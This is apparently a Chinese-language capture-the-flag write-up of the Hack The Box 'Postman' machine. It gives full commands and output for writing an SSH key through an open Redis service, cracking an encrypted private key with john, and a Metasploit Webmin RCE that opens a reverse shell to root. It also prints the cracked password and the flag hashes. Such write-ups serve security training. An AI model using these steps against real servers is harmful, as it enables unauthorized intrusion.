Basic Scan

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
~/Documents/HTB/Postman root@kali
❯ cat nmap_All.txt
# Nmap 7.80 scan initiated Mon Jan 20 18:28:27 2020 as: nmap -sC -sV -p- -oN nmap_All.txt 10.10.10.160
Nmap scan report for postman (10.10.10.160)
Host is up (0.28s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis    Redis key-value store 4.0.9
10000/tcp open  ssl/http MiniServ 1.910 (Webmin httpd)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: MiniServ/1.910
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-trane-info: Problem with XML parsing of /evox/about
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on Postman
| Not valid before: 2019-08-25T16:26:22
|_Not valid after:  2024-08-23T16:26:22
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 20 19:16:04 2020 -- 1 IP address (1 host up) scanned in 2857.11 seconds

NMAP结果显示共开放四个端口,22端口OpenSSH为较新版本,并无高危漏洞。

Web Detect

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
~/Documents/HTB/Postman root@kali
❯ cat gobuster.txt
http://10.10.10.160/index.html (Status: 200) [Size: 3842]
http://10.10.10.160/images (Status: 301) [Size: 313]
http://10.10.10.160/upload (Status: 301) [Size: 313]
http://10.10.10.160/css (Status: 301) [Size: 310]
http://10.10.10.160/js (Status: 301) [Size: 309]
http://10.10.10.160/fonts (Status: 301) [Size: 312]
http://10.10.10.160/server-status (Status: 403) [Size: 300]

~/Documents/HTB/Postman root@kali
❯ cat nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.160
+ Target Hostname:    10.10.10.160
+ Target Port:        80
+ Start Time:         2020-01-20 18:24:40 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: f04, size: 590f549ce0d74, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7865 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-01-20 19:13:43 (GMT8) (2943 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

针对80端口的扫描也未显示有任何有趣的信息。 而10000端口存在Webmin,版本1.910,经查,存在RCE。 但实际使用过程中,需要用户凭证,故猜测思路为: User -> Find credentials -> RCE -> root

User.txt

Pentesting Redis

根据扫描结果,机器同时也开放了6379端口,根据 [这篇文章]中提到的方法首先生成ssh key。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
~/Documents/HTB/Postman root@kali
❯ ssh-keygen -t rsa -f id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:rGrn786gHw6q9oO8n/y/L5HzErf6qQuMlCakiC0Z7UI root@kali
The key's randomart image is:
+---[RSA 3072]----+
|                 |
| .               |
|.E.              |
|*=  .  .         |
|B.o+    S        |
| o+ o  * .       |
|. ...o+ * .      |
| +.oo=o* o.      |
|oo=*===X#+       |
+----[SHA256]-----+

远程写入ssh key到目标用户中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
~/Documents/HTB/Postman root@kali
❯ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

~/Documents/HTB/Postman root@kali
❯ cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
OK

~/Documents/HTB/Postman root@kali
❯ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/.ssh/
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379>

完成之后使用密钥登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~/Documents/HTB/Postman root@kali
❯ ssh -i id_rsa redis@10.10.10.160
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ whoami
redis
redis@Postman:~$

Immigrate to High Privilege User

查看Home目录后,发现存在用户Matt,尝试读取user.txt 提示权限不够。

1
2
3
4
5
6
7
8
redis@Postman:~$ ls /home/
Matt
redis@Postman:~$ cd /home/Matt
redis@Postman:/home/Matt$ ls
user.txt
redis@Postman:/home/Matt$ cat user.txt 
cat: user.txt: Permission denied
redis@Postman:/home/Matt$

在探索的过程中在/opt/目录下发现ssh key

1
2
redis@Postman:/opt$ ls
id_rsa.bak

检查之后发现经过RSA加密,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
redis@Postman:/opt$ cat id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
redis@Postman:/opt$

将其考到本地,使用john暴力破解,得到密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~/Documents/HTB/Postman root@kali                                                                                                                                                                                                          
❯ python /usr/share/john/ssh2john.py id_rsa_Matt.hash id_rsa_Matt.hash >id_rsa_Matt.john  
~/Documents/HTB/Postman root@kali
❯ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_Matt.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa_Matt.hash)
1g 0:00:00:07 42.73% (ETA: 12:54:56) 0.1347g/s 839905p/s 839905c/s 839905C/s liamnoellie..liamnh
1g 0:00:00:18 DONE (2020-01-21 12:54) 0.05555g/s 796761p/s 796761c/s 796761C/sa6_123..*7¡Vamos!
Session completed

获得密码后,使用ssh key 登录失败,使用su 切换用户成功。获得user.txt

1
2
3
4
5
6
redis@Postman:/opt$ su Matt
Password: 
Matt@Postman:/opt$ cd
Matt@Postman:~$ cat user.txt 
517ad0ec2458ca97af8d93aac08a2f3c
Matt@Postman:~$

Privilege Escalation

经过检查,webmin运行在root权限下。

1
2
3
4
5
Matt@Postman:~$ ps -ef | grep webmin
root        705      1  0 04:28 ?        00:00:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
root        900    705  0 04:59 ?        00:00:00 /usr/share/webmin/package-updates/update.cgi
Matt        947    883  0 05:01 pts/0    00:00:00 grep --color=auto webmin
Matt@Postman:~$

和之前计划的一样,使用PoC提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
msf5 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   Matt             yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.24      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910


msf5 exploit(linux/http/webmin_packageup_rce) > exploit 

[*] Started reverse TCP handler on 10.10.14.24:4444 
[+] Session cookie: 59f3fe7bd37b2b102da760cbe1f1ce8b
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.160:41748) at 2020-01-21 12:58:05 +0800

id 
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@Postman:/usr/share/webmin/package-updates/# cd
cd
root@Postman:~# cat root.txt
cat root.txt
a257741c5bed8be7778c6ed95686ddce
root@Postman:~#